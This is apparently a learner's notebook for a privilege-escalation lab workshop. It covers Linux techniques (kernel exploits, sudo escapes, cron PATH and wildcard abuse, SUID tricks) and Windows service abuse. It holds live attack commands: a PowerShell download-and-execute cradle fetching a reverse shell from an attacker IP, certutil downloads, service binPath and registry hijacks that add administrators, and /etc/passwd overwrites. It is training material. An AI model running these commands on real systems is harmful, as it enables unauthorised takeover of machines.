Link to exercise: https://github.com/sagishahar/lpeworkshop

                                                                       Linux

---------------------------------------------------------------------------------------

Questions:https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf

Scripts:https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

Exercise 1 - Kernel

uname -a (check version of kernel)

use google or searchsploit to check if the version is vulnerable to any exploit

more info from liveoverflow about dirtycow: 

https://www.youtube.com/watch?v=kEsshExn7aE&vl=en

Exercise 2 - Daemons

Basic recon: LinEnum, linprivchecker, Linpeas, Linux Exploit Suggester and pspy

and check services against searchsploit

Exercise 6 - Sudo (Shell Escape Sequences)

sudo -l and search GTFObins for any shell escapes

Exercise 7 - Sudo (Abusing Intended Features)

check for unknown binaries if not found in GTFObins for bugs

Exercise 8 - Sudo (LD_PRELOAD)

more info:

https://www.boiteaklou.fr/Abusing-Shared-Libraries.html

Exercise 9 - NFS

mount to your own system and run as root (root is not removed)

Exercise 10 - Cron (Path)

checking cronjobs: pspy, crontab -l, cat /etc/crontab

checking if binary is vulnerable to path exploiting: echo $PATH or use linpeas

more info on path: 

https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

more info check out ippsec's nineveh to create your own script to catch cronjobs

https://www.youtube.com/watch?v=K9DKULxSBK4&t=1890s

Exercise 11 - Cron (Wildcards)

turning * into command options and exploiting shell escapes:

https://gtfobins.github.io/gtfobins/tar/

Exercise 12 - Cron (File Overwrite)

bad perms

find world-writable files 

find / -perm -o+w 2>/dev/null 

Exercise 13 - File Permissions (Suid Binary - .so Injection)

Binaries attempting to run missing .so files

Exercise 14 - File Permissions (Suid Binary -  Symlinks)

link owned file -> file owned by root

ln -s /home/user/user_file /root

(suid will be able to access /root file)

for example, tar -cvf /home/user/backup.tar /home/user/user_file

(unzip backup.tar for /root)

more info: https://percussiveelbow.github.io/linux-privesc/

Exercise 15 and 16 - File Permissions (Environment Variables)

# strings execute_me: /usr/bin/service apache2 start

check SUID with strings to check what it is running

function /usr/bin/service() { whoami; }    <- create function

export -f /usr/bin/service <- link function to env

export -f (to check function u just created)

# strings execute_me2: service apache2 start

alternatively:

function service() { whoami; }

                                                                 Windows

---------------------------------------------------------------------------------------

Exercise 2 - Services (DLL Hijacking)

DLL hijacking works by placing your own DLL in a writable path which a service would attempt to run but fails as it is missing, hence "NAME NOT FOUND"

Kali:

Use nishang's invoke-powershelltcp.ps1:

https://github.com/samratashok/nishang

type this command in the window's powershell to get shell:

IEX (new-object net.webclient).downloadstring('http://x.x.x.x/x.ps1')

use certutil.exe -urlcache -split -f *url *file_name to download a file.

change the shell script to another port and listen on that port.

run start-service dllsvc to run your dll.

instead of using procmon you can use powersploit:

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

Exercise 3 - Services (binPath)

Replacing the binPath of a service to your command makes the service run that instead of starting the executable.

Checks for permissions for "Everyone" on every service.

while doing exercise 3 I noticed that when I start daclsvc, it errored out.

but it still ran the command (to add user to admin group) anyways.
#sc config daclsvc binpath= "net localgroup administrators user /add"

After trying IEX and certutil, it didn't work, probably some encoding issue.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md

when to look for more reverse shells and tried mshta, it seemed to work

more info:https://github.com/freshness79/HTA-Shell

Exercise 4 - Services (Unquoted Path)

Command: https://pentestlab.blog/2017/03/09/unquoted-service-path/

More info: https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae

Hence the service would run common.exe first.

Exercise 5 - Services (Registry)

Alternatively, you can use 'everyone allow  fullcontrol'

Command: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\common.exe /f

#change registry to point to path of your executable

Exercise 6 - Services (Executable File)

Copy and paste the .exe as moving it will use the permissions of "File Permissions Service" which you do not have access to.

All edited programs/code referenced from: https://github.com/sagishahar/lpeworkshop

/#making a password

openssl passwd password (1oCs2Y6GOzDm2)2020/04/28/203446

openssl passwd pass (mV.TZP57qoG6s)

source: Editing /etc/passwd File for Privilege Escalation

---------------------------------------------------------------------------------------

#changing /etc/passwd   root:password

---------------------------------------------------------------------------------------

#/etc/shadow    root with no login (default)

#trying to log in to root with password: success

---------------------------------------------------------------------------------------

#changing /etc/shadow    root:pass

Conclusion: /etc/passwd > /etc/shadow